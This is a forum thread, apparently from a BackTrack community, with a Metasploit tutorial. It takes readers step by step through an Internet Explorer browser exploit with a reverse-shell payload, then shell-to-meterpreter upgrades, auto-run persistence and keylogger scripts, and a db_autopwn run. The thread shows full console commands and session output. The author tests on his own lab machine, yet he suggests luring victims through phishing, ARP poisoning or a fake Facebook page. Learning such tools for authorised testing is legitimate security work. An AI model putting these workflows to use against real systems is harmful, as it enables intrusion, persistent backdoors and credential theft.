Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: My Metasploit tutorial thread

Hybrid View

  1. #1
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default My Metasploit tutorial thread

    For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see inlcuded or corrections that may need to be made. Currently this post is a work in progress

    This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip"
    More info available from Exploit-db New IE6,7,8 mem corruption


    Common msfconsole tasks;
    first of course open a terminal and issue the command
    Code:
    root@bt:~#msfconsole
    Then there are some basics like searching for exploits. A more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 microsoft security advisories.
    Code:
    search ms10
    Next, maybe we want to know more about a given exploit; This information looks similar to what is found on the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.
    Code:
    info windows/browser/ms10_xxx_ie_css_clip
    now we will load up an exploit we'd like to try.
    Code:
    use windows/browser/ms10_xxx_ie_css_clip
    We need to configure our exploit options for it to work of course. I like to select payloads first. Not all payloads work with all exploits. Too keep things simple the metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below(show payloads) the framwork will only show the payloads that work for your selected exploit.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show payloads
    Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp
    Lets go ahead and select a payload to use.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp
    Now we need to configure our options. Lets take a look at what options we have.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show options
    ok, lets set things up!
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
    msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
    msf exploit(ms10_xxx_ie_css_clip) > set uripath /
    msf exploit(ms10_xxx_ie_css_clip) > set srvport 80
    The uripath options sets the directory the malicious webserver will be located. Root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options such as the excellent
    Metasploit Unleashed Information Security Training
    Here is where you might want to include some automation or set some of the other features. To view advanced options available, issue the following command;
    Code:
    show advanced
    A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
    Please refer to the section 10 (meterpreter scripting) of the MSF unleashed course for more information on which scripts are available.
    Another way is to issue the follow command in your terminal(not in the framework console)
    Code:
    root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
    arp_scanner.rb           enum_putty.rb            getcountermeasure.rb      multi_meter_inject.rb   remotewinenum.rb                 webcam.rb
    autoroute.rb             enum_shares.rb           getgui.rb                 multicommand.rb         scheduleme.rb                    win32-sshclient.rb
    checkvm.rb               enum_vmware.rb           gettelnet.rb              multiscript.rb          schtasksabuse.rb                 win32-sshserver.rb
    credcollect.rb           event_manager.rb         getvncpw.rb               netenum.rb              scraper.rb                       winbf.rb
    domain_list_gen.rb       file_collector.rb        hashdump.rb               packetrecorder.rb       screen_unlock.rb                 winenum.rb
    dumplinks.rb             get_application_list.rb  hostsedit.rb              panda_2007_pavsrv51.rb  search_dwld.rb                   wmic.rb
    duplicate.rb             get_env.rb               keylogrecorder.rb         persistence.rb          service_permissions_escalate.rb
    enum_chrome.rb           get_filezilla_creds.rb   killav.rb                 pml_driver_config.rb    srt_webdrive_priv.rb
    enum_firefox.rb          get_local_subnets.rb     metsvc.rb                 powerdump.rb            uploadexec.rb
    enum_logged_on_users.rb  get_loggedon_users.rb    migrate.rb                prefetchtool.rb         virtualbox_sysenter_dos.rb
    enum_powershell_env.rb   get_pidgin_creds.rb      multi_console_command.rb  process_memdump.rb      vnc.rb
    The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
    Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.
    Code:
    exploit -j
    Now find a creative way to lure your victim to your malicious website in this case since the exploit we've selected here is a client side. You could use ARP poisoning or a phishing style attack with the link. Be inventive! I am just using a simple not updated windows XP SP3 machine running on my LAN in Virtualbox, so I will just browse there myself. In my victim's web-browser I simply entered my attackers IP
    Code:
    http://192.168.1.105/
    Well we got a session!. Here is some output from my msfconsole
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > exploit -j
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 192.168.1.105:31337 
    [*] Using URL: http://0.0.0.0:80/
    [*]  Local IP: http://192.168.1.105:80/
    [*] Server started.
    msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
    [*] Sending stage (240 bytes) to 192.168.1.147
    [*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
    [*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
    [-] Error: Command shell sessions do not support migration
    In this case we are using a simple reverse shell and not a meterpreter. The migration error is ok, as migrate is a meterpreter script. Some instances maybe you could only begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do

    Turning windows shells into meterpreter sessions the easy way.
    First, lets list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions
    
    Active sessions
    ===============
    
      Id  Type   Information  Connection
      --  ----   -----------  ----------
      1   shell               192.168.1.105:31337 -> 192.168.1.147:1055
    
    msf exploit(ms10_xxx_ie_css_clip) > sessions -h
    Usage: sessions [options]
    
    Active session manipulation and interaction.
    
    OPTIONS:
    
        -K        Terminate all sessions
        -c <opt>  Run a command on the session given with -i, or all
        -d <opt>  Detach an interactive session
        -h        Help banner
        -i <opt>  Interact with the supplied session ID
        -k <opt>  Terminate session
        -l        List all active sessions
        -q        Quiet mode
        -s <opt>  Run a script on the session given with -i, or all
        -u <opt>  Upgrade a win32 shell to a meterpreter session
        -v        List verbose fields
    that -u options is pretty sweet. Lets go ahead and upgrade our shell to a meterpreter. FYI, It did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway the update a shell command is;
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1
    EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
    Makerc is useful as it will generate a metasploit resource file(akin to a bash script for metasploit almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF unleashed course
    m10_061_spoolss demo
    ...continued....
    Last edited by iproute; 11-16-2010 at 01:49 AM.

  2. #2
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Now that we've "upgraded" lets discuss those meterpreter automations scripts briefly again.
    To find out what syntax or features and options a script has you can use the run command, the script name, then the -h options. Here are some examples of a couple of the scripts I find useful
    Code:
    meterpreter > run persistence -h
    
    OPTIONS:
    
        -A        Automatically start a matching multi/handler to connect to the agent
        -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
        -U        Automatically start the agent when the User logs on
        -X        Automatically start the agent when the system boots
        -h        This help menu
        -i <opt>  The interval in seconds between each connection attempt
        -p <opt>  The port on the remote host where Metasploit is listening
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    
    
    meterpreter > run win32-sshserver -h
    OpenSSH-server deploy+run script
    This script will deploy OpenSSH + run the SSH-server as a service
    
    OPTIONS:
    
        -F        Force overwriting of registry-values
        -I <opt>  Install OpenSSH to the given directory
        -N <opt>  Set custom service name
        -S <opt>  Set custom service description
        -U <opt>  Download OpenSSH-SFX from given URL
        -f <opt>  The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com
        -h        This help menu
        -m <opt>  Do not start the OpenSSH-service after installation
        -p <opt>  Password for the new user
        -r        Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)
        -t <opt>  Set start-type of the service to manual (Default: auto)
        -u <opt>  Add windows-user (autoadded to local administrators
    One handy feature is to set environment variables globally. This can be done with setg. Here is an example of setting meterpreter as the payload globally.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > setg payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    You can show all the globally set variables by using setg by itself.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > setg
    
    Global
    ======
    
      Name           Value
      ----           -----
      AutoRunScript  keylogrecorder
      lhost          192.168.1.105
      lport          31337
      payload        windows/meterpreter/reverse_tcp
    
    msf exploit(ms10_xxx_ie_css_clip) >
    These can be unset using unsetg
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > unsetg
    Usage: unset var1 var2 var3 ...
    
    The unset command is used to unset one or more variables.
    To flush all entires, specify 'all' as the variable name
    msf exploit(ms10_xxx_ie_css_clip) > unsetg all
    Flushing datastore...
    msf exploit(ms10_xxx_ie_css_clip) >
    A very cool way I've found for using setg for the global variables is with the Social Engineering Toolkit.
    Say you want to be quick and dirty as you have other tasks for this pentest. You've already compromised your client's wireless network using your ninja skills, so you set up a fake facebook with SET, using a java attack, and ARP poison some of the interesting workstations on said wireless network with dns spoof, and get a meterpreter session. Now as we said, you also have a lot of other work to do on this particular pentest. Well you can
    Code:
    msf > setg InitialAutoRunScript persistence
    InitialAutoRunScript => persistence
    msf > setg AutoRunScript keylogrecorder
    AutoRunScript => keylogrecorder
    And get sessions, that you can make sure you will keep, and even grab credentials for all kinds of things, while you're working on your reporting or doing some further research. The global variables I have tried with the social engineering toolkit have allowed me to further tweak it's capabilities and automation. Thanks rel1k for such great tools!


    I will continue to add things to this thread as I go on.

    I will update this thread a little later on with my favorite resource links for Metasploit education.
    Hope this thread is useful to some of you, even though there is a lot of redundant metasploit info out there.


    Links section
    Metasploit class - Rel1k, purehate, nullthreat, and irongeek
    Metasploit Megaprimer
    MSF Unleashed

    Vivek's Scanario based hacking series part 1
    Vivek, SBH part 2a
    Vivek, SBH part 3
    Vivek, SBH part 4
    Metasploit Wiki - There is some really good stuff here
    One of the best HOWTO's on the forum right now involves improving the effectiveness of db_autopwn by our moderator sickness. I recommend it
    http://www.backtrack-linux.org/forum...ostgresql.html
    Carlos Perez, master of meterpreter scripts
    RickRoll Meterpreter script - requires editing
    I've linked in darkoperator's rickroll script as it's a good laugh and also can be useful for when you need to demonstrate something to management. Nice way to demonstrate taking control of a PC without having to get any sort of remote desktop or VNC session. The laugh will make it easier and you could even use a full screen video of it, also locking the keyboard and mouse are functions of the script, so it only stops when you say so.


    More Videos from vivek on Assembly. Helps to understand what many of these exploits are actually doing.
    Assembly Primer part 1
    Assembly Primer part 2
    Assembly Primer part 3
    Assembly Primer part 4
    Assembly Primer part 5
    Assembly Primer part 6
    Assembly Primer part 7
    Assembly Primer part 8
    Assembly Primer part 9
    Assembly Primer part 10
    Assembly Primer part 11





    And one last thing.... The metasploit developers recommend updating your metasploit at least every couple of days. New exploits are released, quite often existing code is improved, or better yet we are seeing new meterpreter scripts all the time.

    This can be done using
    Code:
    msfupdate

    Hope everyone enjoys my post, please leave comments, and lets all take a moment to thank the giants on whose shoulders we stand (backtrack developers, MSF developers, and other community contributors)!
    Last edited by iproute; 11-18-2010 at 03:16 PM.

  3. #3
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    The Metasploit class I've referenced on irongeek I actually just found and began watching myself when writing this tut. So far my fav part is Adrian asking, "Ok, so how many people are using metasploit in linux....?" [raising of hands] "And how many people are using msf in windows?" "ok, Just you..."


    Seriously though, the framework is generally much smoother in linux, but sometimes it really is handy to have it in windows.

    From the first video there, one new thing Adrian and Dave brought to my attention was the "sessions -l -v". The -v switch shows what exploit was performed to get said session. Here is a scenario that demonstrates how useful that is. We're running a db_autopwn against a victim. We get a number of sessions but want to know what exploits were successful

    Code:
    [*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
    [*] (50/50 [0 sessions]): Waiting on 21 launched modules to finish execution...
    [*] (50/50 [0 sessions]): Waiting on 12 launched modules to finish execution...
    [*] Meterpreter session 1 opened (192.168.25.133:30912 -> 192.168.25.147:1093) at 2010-11-15 03:48:22 -0600
    [*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
    [*] Meterpreter session 2 opened (192.168.25.133:27629 -> 192.168.25.147:1094) at 2010-11-15 03:48:27 -0600
    [*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
    [*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 8 launched modules to finish execution...
    [*] Meterpreter session 3 opened (192.168.25.133:22206 -> 192.168.25.147:1096) at 2010-11-15 03:49:10 -0600
    [*] Meterpreter session 4 opened (192.168.25.133:15119 -> 192.168.25.147:1097) at 2010-11-15 03:49:10 -0600
    [*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
    
    msf > sessions
    
    Active sessions
    ===============
    
      Id  Type                   Information                            Connection
      --  ----                   -----------                            ----------
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093
      2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097
    
    msf > sessions -v
    
    Active sessions
    ===============
    
      Id  Type                   Information                            Connection                                   Via
      --  ----                   -----------                            ----------                                   ---
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093  exploit/windows/smb/ms08_067_netapi
      2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094  exploit/windows/smb/ms08_067_netapi
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096  exploit/windows/smb/ms10_061_spoolss
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097  exploit/windows/smb/ms10_061_spoolss
    Bear in mind the IPs used in the above scenario a different from the beginning of the post. Just an isolated subnet for my virtual machines.


    Some more commands I don't frequently see used in some of the other resources around.

    First the makerc command is handy for making a resource file from the session you've just run. I'll get some information on using resource files in here also, but there is some information found in the MSFunleashed course.
    Code:
    msf exploit(ms10_061_spoolss) > makerc
    Usage: makerc <output rc file>
    
    Save the commands executed since startup to the specified file.
    msf exploit(ms10_061_spoolss) > makerc spoolss-test.rc
    [*] Saving last 21 commands to spoolss-test.rc ...
    Last edited by iproute; 11-16-2010 at 12:22 AM.

  4. #4
    Junior Member
    Join Date
    Oct 2010
    Location
    TOTSE
    Posts
    28

    Default Re: My Metasploit tutorial thread

    Wow, this certainly looks like a great tutorial. Now going to have a read through, thanks for posting!

  5. #5
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: My Metasploit tutorial thread

    thank you man

  6. #6
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: My Metasploit tutorial thread

    THANK YOU AGAIN AND I WANT ADD THIS TUT :
    Download videos from securitytube.net
    Method 1 :
    ———
    Viewing the source of the page in which the video is being played, and searching for “.mp4″ gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use firefox, and i used the download manager which came with the addon named “DownThemAll!” for this purpose.

    Method 2 :
    ———
    In case you are using linux, then the videos get buffered into the /tmp directory. Mostly, they`ll begin with the name “Flash” to be followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

    Hope this helps!!! ;-)

  7. #7
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Quote Originally Posted by skull2006 View Post
    THANK YOU AGAIN AND I WANT ADD THIS TUT :
    Download videos from securitytube.net
    Method 1 :
    ———
    Viewing the source of the page in which the video is being played, and searching for “.mp4″ gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use firefox, and i used the download manager which came with the addon named “DownThemAll!” for this purpose.

    Method 2 :
    ———
    In case you are using linux, then the videos get buffered into the /tmp directory. Mostly, they`ll begin with the name “Flash” to be followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

    Hope this helps!!! ;-)
    Appreciate the tip! There are a lot of videos references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his xbox media center so he can use his epic size projector.

    I like to use Ant Video Downloader with embedded FLV Player
    which is a firefox plugin, with a player included so you don't need to go searching for where the heck it put those flv files(because where is does is somewhat of a long path sometimes).
    Last edited by iproute; 11-16-2010 at 12:26 AM.

  8. #8
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: My Metasploit tutorial thread

    Quote Originally Posted by iproute View Post
    Appreciate the tip! There are a lot of videos references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his xbox media center so he can use his epic size projector.

    I like to use Ant Video Downloader with embedded FLV Player
    which is a firefox plugin, with a player included so you don't need to go searching for where the heck it put those flv files(because where is does is somewhat of a long path sometimes).
    thank you for that too..........
    And what about other SBH if the victim have AV,firewall,Patched.
    May you can give us an Idea for that?

    Best regards,
    Last edited by skull2006; 11-16-2010 at 03:57 AM.

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    And what about other SBH if the victim have AV,firewall,Patched.
    May you can give us an Idea for that?
    I'll give some info on my take on it in another post when I've got more time, but I'm definitey not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.



    On another note, one of the things I feel I've missed above links wise is
    IHS*|*Home of Johnny Long and Hackers for Charity, Inc
    Please at least take a look at some of the cool stuff Johnny Long is doing.

  10. #10
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    I've decided to add a section on using db_autopwn, just too add to completeness and content. Please spend some time with the resources I've included in the links section as well. db_autopwn is a very handy tool to get some work done quickly, however using exploits individually can often be more effective as well as quieter/stealthier. Also, please configure you're postgresql database, as many of us have pointed out quite a number of times that sqlite3 has issues or is not as reliable as postgres for using db_autopwn. Visit sickn3ss' thread listed in the links section for information on configuring postgresql for this use.
    Below is setting the driver, and confirming it is set to what you need
    Code:
    root@bt:~# msfconsole
    msf > db_driver postgresql
    [*] Using database driver postgresql
    msf > db_driver 
    [*]    Active Driver: postgresql
    [*]        Available: postgresql, sqlite3
    
    [*]    DB Support: Enable the mysql driver with the following command:
    [*]                 $ gem install mysql
    [*]     This gem requires mysqlclient headers, which can be installed on Ubuntu with:
    [*]                 $ sudo apt-get install libmysqlclient-dev
    This is what will be output if you have not yet used postgres for this(i.e. have not created the database. In this case we are creating the database 'db_autopwn')
    Anyway, here is the command to connect
    Code:
    msf > db_connect postgres:mypassword@127.0.0.1/db_autopwn
    NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
    NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
    NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
    NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
    NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
    NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
    NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"
    NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"
    NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"
    NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"
    NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"
    NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"
    NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"
    NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"
    NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"
    NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"
    NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"
    NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"
    NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"
    NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"
    NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"
    NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"
    NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"
    NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"
    NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"
    NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"
    NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"
    Next, I like to verify the status of the connection. If you are not creating a new database and are connecting to an existing one, it may be a good idea to see if you've left anything in it. Here's the example
    Code:
    msf > db_status 
    [*] postgresql connected to db_autopwn
    msf > db_hosts 
    
    Hosts
    =====
    
    address  address6  arch  comm  comments  created_at  info  mac  name  os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at  svcs  vulns  workspace
    -------  --------  ----  ----  --------  ----------  ----  ---  ----  ---------  -------  -------  -----  -------  -----  ----------  ----  -----  ---------
    I like to clean my output on db_hosts, as the nmap string I like to use for quick doesn't fill a number of the fields. Here's how.
    Code:
    msf > db_hosts -h
    Usage: db_hosts [-h|--help] [-u|--up] [-a <addr1,addr2>] [-c <column1,column2>] [-o output-file ]
    
      -a <addr1,addr2>  Search for a list of addresses
      -c <col1,col2>    Only show the given columns
      -h,--help         Show this help information
      -u,--up           Only show hosts which are up
      -o <file>         Send output to a file in csv format
    
    Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at 
    
    msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns
    
    Hosts
    =====
    
    address  mac  name  state  updated_at  svcs  vulns
    -------  ---  ----  -----  ----------  ----  -----
    In the example above, there is nothing in the database. Entries can be added or otherwise manipulated manually with commands such as "db_add_host, db_add_port, db_del_host,etc." Of course nmap is a much simpler way of populating your database. Right now we are just going to add an individual host in with db_nmap, but you can certainly scan in a subnet instead.


    ...continues...
    Last edited by iproute; 11-18-2010 at 04:36 PM.

Page 1 of 2 12 LastLast

Similar Threads

  1. [Tutorial] Curso Metasploit Framework (traduzido)
    By rafaeltorresrj in forum Tutoriais e Howtos
    Replies: 8
    Last Post: 08-08-2010, 01:42 AM
  2. Metasploit auxilary file_autopwn module - Video Tutorial
    By brtw2003 in forum BackTrack Videos
    Replies: 5
    Last Post: 03-13-2010, 11:20 AM
  3. Tutorial Request Thread
    By KMDave in forum Tutorials und Howtos
    Replies: 20
    Last Post: 01-20-2010, 03:04 AM
  4. Metasploit problem with getting a tutorial to work
    By sertas in forum OLD BackTrack 4 General Support
    Replies: 1
    Last Post: 07-18-2009, 01:03 PM
  5. Metasploit 3 tutorial for beginner?
    By LLO6969 in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-13-2008, 10:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •